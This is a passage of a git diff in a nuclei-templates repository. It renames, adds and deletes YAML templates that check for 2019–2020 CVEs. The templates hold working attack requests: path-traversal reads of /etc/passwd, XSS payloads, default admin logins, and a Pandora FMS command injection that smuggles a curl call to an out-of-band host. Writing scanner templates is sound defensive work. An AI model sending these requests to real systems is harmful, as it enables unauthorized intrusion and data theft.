"root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-7481.yaml b/nuclei-templates/CVE-2019/CVE-2019-7481.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-7481.yaml rename to nuclei-templates/CVE-2019/CVE-2019-7481.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8442.yaml b/nuclei-templates/CVE-2019/CVE-2019-8442.yaml deleted file mode 100644 index 5079f927ff..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-8442.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2019-8442 -info: - name: JIRA Directory Traversal - author: Kishore Krishna (siLLyDaddy) - severity: high - description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check. - reference: - - https://jira.atlassian.com/browse/JRASERVER-69241 - - http://web.archive.org/web/20210125215006/https://www.securityfocus.com/bid/108460/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-8442 - tags: cve,cve2019,atlassian,jira,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" - - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'com.atlassian.jira' - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-8903.yaml b/nuclei-templates/CVE-2019/CVE-2019-8903.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8903.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8903.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-8982.yaml b/nuclei-templates/CVE-2019/CVE-2019-8982.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8982.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8982.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-9618.yaml b/nuclei-templates/CVE-2019/CVE-2019-9618.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-9618.yaml rename to nuclei-templates/CVE-2019/CVE-2019-9618.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-9726.yaml b/nuclei-templates/CVE-2019/CVE-2019-9726.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-9726.yaml rename to nuclei-templates/CVE-2019/CVE-2019-9726.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-10092.yaml b/nuclei-templates/CVE-2019/cve-2019-10092.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-10092.yaml rename to nuclei-templates/CVE-2019/cve-2019-10092.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-10232.yaml b/nuclei-templates/CVE-2019/cve-2019-10232.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-10232.yaml rename to nuclei-templates/CVE-2019/cve-2019-10232.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-10405.yaml b/nuclei-templates/CVE-2019/cve-2019-10405.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-10405.yaml rename to nuclei-templates/CVE-2019/cve-2019-10405.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-10475.yaml b/nuclei-templates/CVE-2019/cve-2019-10475.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-10475.yaml rename to nuclei-templates/CVE-2019/cve-2019-10475.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-11043.yaml b/nuclei-templates/CVE-2019/cve-2019-11043.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-11043.yaml rename to nuclei-templates/CVE-2019/cve-2019-11043.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-11370.yaml b/nuclei-templates/CVE-2019/cve-2019-11370.yaml deleted file mode 100644 index c2f5e3f80f..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-11370.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2019-11370 - -info: - name: Carel pCOWeb \">') - condition: and - -# Enhanced by mp on 2022/08/08 diff --git a/nuclei-templates/CVE-2019/CVE-2019-11510.yaml b/nuclei-templates/CVE-2019/cve-2019-11510.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-11510.yaml rename to nuclei-templates/CVE-2019/cve-2019-11510.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-11580.yaml b/nuclei-templates/CVE-2019/cve-2019-11580.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-11580.yaml rename to nuclei-templates/CVE-2019/cve-2019-11580.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12314.yaml b/nuclei-templates/CVE-2019/cve-2019-12314.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-12314.yaml rename to nuclei-templates/CVE-2019/cve-2019-12314.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-12581.yaml b/nuclei-templates/CVE-2019/cve-2019-12581.yaml new file mode 100644 index 0000000000..ed07cdfb22 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12581.yaml @@ -0,0 +1,45 @@ +id: CVE-2019-12581 + +info: + name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting + author: n-thumann + severity: medium + description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. + reference: + - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml + - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ + - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ + - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12581 + cwe-id: CWE-79 + metadata: + shodan-query: http.title:"ZyWall" + tags: cve,cve2019,zyxel,zywall,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/free_time_failed.cgi?err_msg=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Please contact with administrator." + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2019/CVE-2019-12616.yaml b/nuclei-templates/CVE-2019/cve-2019-12616.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-12616.yaml rename to nuclei-templates/CVE-2019/cve-2019-12616.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-12962.yaml b/nuclei-templates/CVE-2019/cve-2019-12962.yaml new file mode 100644 index 0000000000..13749b9d0e --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12962.yaml @@ -0,0 +1,49 @@ +id: CVE-2019-12962 + +info: + name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting + author: Clment Cruchet + severity: medium + description: | + LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. + reference: + - https://www.exploit-db.com/exploits/49669 + - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ + - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12962 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:LiveZilla + verified: true + tags: xss,edb,packetstorm,cve,cve2019,livezilla + + +requests: + - method: GET + path: + - '{{BaseURL}}/mobile/index.php' + + headers: + Accept-Language: ';alert(document.domain)//' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var detectedLanguage = ';alert(document.domain)//';" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/08 diff --git a/nuclei-templates/CVE-2019/cve-2019-13396.yaml b/nuclei-templates/CVE-2019/cve-2019-13396.yaml deleted file mode 100644 index c6ef0512e4..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-13396.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2019-13396 - -info: - name: FlightPath Local File Inclusion - author: 0x_Akoko,daffainfo - severity: medium - description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability. - reference: - - https://www.exploit-db.com/exploits/47121 - - https://www.cvedetails.com/cve/CVE-2019-13396/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 - - http://getflightpath.com/node/2650 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-13396 - cwe-id: CWE-22 - tags: cve,cve2019,flightpath,lfi - -requests: - - raw: - - | - GET /login HTTP/1.1 - Host: {{Hostname}} - - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: token - part: body - group: 1 - internal: true - regex: - - "idden' name='form_token' value='([a-z0-9]+)'>" diff --git a/nuclei-templates/CVE-2019/CVE-2019-14322.yaml b/nuclei-templates/CVE-2019/cve-2019-14322.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14322.yaml rename to nuclei-templates/CVE-2019/cve-2019-14322.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-14470.yaml b/nuclei-templates/CVE-2019/cve-2019-14470.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14470.yaml rename to nuclei-templates/CVE-2019/cve-2019-14470.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15811.yaml b/nuclei-templates/CVE-2019/cve-2019-15811.yaml new file mode 100644 index 0000000000..e518b68a14 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-15811.yaml @@ -0,0 +1,49 @@ +id: CVE-2019-15811 + +info: + name: DomainMOD <=4.13.0 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters. + reference: + - https://www.exploit-db.com/exploits/47325 + - https://github.com/domainmod/domainmod/issues/108 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15811 + - https://zerodays.lol/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-15811 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2019,domainmod,xss,authenticated,edb + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + + - | + GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(all_headers_2, "text/html")' + - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' + - 'contains(body_2, "DomainMOD")' + condition: and + +# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2019/CVE-2019-15859.yaml b/nuclei-templates/CVE-2019/cve-2019-15859.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-15859.yaml rename to nuclei-templates/CVE-2019/cve-2019-15859.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16097.yaml b/nuclei-templates/CVE-2019/cve-2019-16097.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16097.yaml rename to nuclei-templates/CVE-2019/cve-2019-16097.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16123.yaml b/nuclei-templates/CVE-2019/cve-2019-16123.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16123.yaml rename to nuclei-templates/CVE-2019/cve-2019-16123.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16525.yaml b/nuclei-templates/CVE-2019/cve-2019-16525.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16525.yaml rename to nuclei-templates/CVE-2019/cve-2019-16525.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-1653.yaml b/nuclei-templates/CVE-2019/cve-2019-1653.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-1653.yaml rename to nuclei-templates/CVE-2019/cve-2019-1653.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16759.yaml b/nuclei-templates/CVE-2019/cve-2019-16759.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16759.yaml rename to nuclei-templates/CVE-2019/cve-2019-16759.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16931.yaml b/nuclei-templates/CVE-2019/cve-2019-16931.yaml new file mode 100644 index 0000000000..870a85d2d8 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-16931.yaml @@ -0,0 +1,48 @@ +id: CVE-2019-16931 + +info: + name: WordPress Visualizer <3.3.1 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard. + reference: + - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 + - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf + - https://wpvulndb.com/vulnerabilities/9893 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-16931 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan + +requests: + - raw: + - | + POST /wp-json/visualizer/v1/update-chart HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"id": 7, "visualizer-chart-type": ""} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"success":"Chart updated"}' + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2019/cve-2019-17444.yaml b/nuclei-templates/CVE-2019/cve-2019-17444.yaml new file mode 100644 index 0000000000..d7bb5dd6b7 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-17444.yaml @@ -0,0 +1,43 @@ +id: CVE-2019-17444 + +info: + name: Jfrog Artifactory <6.17.0 - Default Admin Password + author: pdteam + severity: critical + description: | + Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. + reference: + - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes + - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory + - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-17444 + cwe-id: CWE-521 + tags: cve,cve2019,jfrog,default-login + +requests: + - raw: + - | + POST /ui/api/v1/ui/auth/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{RootURL}} + + {"user":"admin","password":"password","type":"login"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"name":"admin"' + - '"admin":true' + condition: and + + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/16 diff --git a/nuclei-templates/CVE-2019/CVE-2019-18393.yaml b/nuclei-templates/CVE-2019/cve-2019-18393.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-18393.yaml rename to nuclei-templates/CVE-2019/cve-2019-18393.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-20210.yaml b/nuclei-templates/CVE-2019/cve-2019-20210.yaml new file mode 100644 index 0000000000..b3d521aaa9 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-20210.yaml @@ -0,0 +1,44 @@ +id: CVE-2019-20210 + +info: + name: WordPress CTHthemes - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query. + reference: + - https://wpscan.com/vulnerability/10013 + - https://wpvulndb.com/vulnerabilities/10018 + - https://cxsecurity.com/issue/WLB-2019120112 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-20210 + cwe-id: CWE-79 + tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "/wp-content/themes/citybook" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2019/cve-2019-20224.yaml b/nuclei-templates/CVE-2019/cve-2019-20224.yaml deleted file mode 100644 index 6cde65fe36..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-20224.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2019-20224 - -info: - name: Pandora FMS 7.0NG - Remote Command Injection - author: ritikchaddha - severity: high - description: | - Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request. - reference: - - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/ - - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20224 - - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view - remediation: This issue has been fixed in Pandora FMS 7.0 NG 742. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2019-20224 - cwe-id: CWE-78 - tags: pandorafms,rce,cve,cve2019,authenticated,oast - -requests: - - raw: - - | - POST /pandora_console/index.php?login=1 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - nick=admin&pass=admin&login_button=Login - - - | - POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/17 diff --git a/nuclei-templates/CVE-2019/cve-2019-20354.yaml b/nuclei-templates/CVE-2019/cve-2019-20354.yaml new file mode 100644 index 0000000000..b02d059684 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-20354.yaml @@ -0,0 +1,32 @@ +id: CVE-2019-20354 + +info: + author: "pikpikcu" + name: "piSignage 2.6.4 Directory Traversal" + severity: High + + #Source:-https://github.com/colloqi/piSignage/issues/97 + +requests: + - raw: + - | + GET /api/settings/log?file=../../../../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Content-Length: 277 + Connection: close + Referer: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2019/CVE-2019-2588.yaml b/nuclei-templates/CVE-2019/cve-2019-2588.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-2588.yaml rename to nuclei-templates/CVE-2019/cve-2019-2588.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-2616.yaml b/nuclei-templates/CVE-2019/cve-2019-2616.yaml new file mode 100644 index 0000000000..af5ede4e98 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-2616.yaml @@ -0,0 +1,31 @@ +id: CVE-2019-2616 + +info: + name: XXE in Oracle Business Intelligence and XML Publisher + author: pdteam + severity: high + description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 + - https://www.exploit-db.com/exploits/46729 + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.20 + cve-id: CVE-2019-2616 + +requests: + - raw: + - | + POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Content-Type: text/xml; charset=UTF-8 + + + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-2729.yaml b/nuclei-templates/CVE-2019/cve-2019-2729.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-2729.yaml rename to nuclei-templates/CVE-2019/cve-2019-2729.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-3402.yaml b/nuclei-templates/CVE-2019/cve-2019-3402.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-3402.yaml rename to nuclei-templates/CVE-2019/cve-2019-3402.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-7192.yaml b/nuclei-templates/CVE-2019/cve-2019-7192.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7192.yaml rename to nuclei-templates/CVE-2019/cve-2019-7192.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-7254.yaml b/nuclei-templates/CVE-2019/cve-2019-7254.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7254.yaml rename to nuclei-templates/CVE-2019/cve-2019-7254.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-7275.yaml b/nuclei-templates/CVE-2019/cve-2019-7275.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-7275.yaml rename to nuclei-templates/CVE-2019/cve-2019-7275.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-7315.yaml b/nuclei-templates/CVE-2019/cve-2019-7315.yaml new file mode 100644 index 0000000000..cb43ae8ab9 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-7315.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-7315 + +info: + name: Genie Access WIP3BVAF IP Camera - Local File Inclusion + author: 0x_Akoko + severity: high + description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow. + reference: + - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/ + - https://vuldb.com/?id.136593 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7315 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-7315 + cwe-id: CWE-22 + tags: cve,cve2019,camera,genie,lfi,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/08 diff --git a/nuclei-templates/CVE-2019/cve-2019-8442.yaml b/nuclei-templates/CVE-2019/cve-2019-8442.yaml new file mode 100644 index 0000000000..2a44940ef6 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-8442.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-8442 +info: + name: JIRA Directory Traversal + author: Kishore Krishna (siLLyDaddy) + severity: high + description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check. + reference: https://jira.atlassian.com/browse/JRASERVER-69241 + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-8442 + +requests: + - method: GET + path: + - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" + - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'com.atlassian.jira' + part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-8446.yaml b/nuclei-templates/CVE-2019/cve-2019-8446.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-8446.yaml rename to nuclei-templates/CVE-2019/cve-2019-8446.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8449.yaml b/nuclei-templates/CVE-2019/cve-2019-8449.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-8449.yaml rename to nuclei-templates/CVE-2019/cve-2019-8449.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8937.yaml b/nuclei-templates/CVE-2019/cve-2019-8937.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-8937.yaml rename to nuclei-templates/CVE-2019/cve-2019-8937.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml b/nuclei-templates/CVE-2020/CVE-2020-10124.yaml deleted file mode 100644 index 065a434919..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-10124.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-10124 -info: - name: SolarWindsOrion LFI - author: medbsq - severity: medium -#- https://www.cvebase.com/cve/2019/11043 - -requests: - - method: GET - path: - - "{{BaseURL}}/web.config.i18n.ashx?l=j&v=j" - - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j" - headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "SolarWinds.Orion.Core.Common." - - "Connection String" - condition: or - part: body - - type: word - words: - - "text/plain" - - "SolarWindsOrionDatabaseUser" - condition: or - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-10220.yaml b/nuclei-templates/CVE-2020/CVE-2020-10220.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-10220.yaml rename to nuclei-templates/CVE-2020/CVE-2020-10220.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-1147.yaml b/nuclei-templates/CVE-2020/CVE-2020-1147.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-1147.yaml rename to nuclei-templates/CVE-2020/CVE-2020-1147.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11546.yaml b/nuclei-templates/CVE-2020/CVE-2020-11546.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-11546.yaml rename to nuclei-templates/CVE-2020/CVE-2020-11546.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-11710.yaml b/nuclei-templates/CVE-2020/CVE-2020-11710.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-11710.yaml rename to nuclei-templates/CVE-2020/CVE-2020-11710.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-11978.yaml b/nuclei-templates/CVE-2020/CVE-2020-11978.yaml deleted file mode 100644 index 5c7f6e6c5b..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-11978.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2020-11978 -info: - name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution - author: pdteam - severity: high - description: An issue was found in 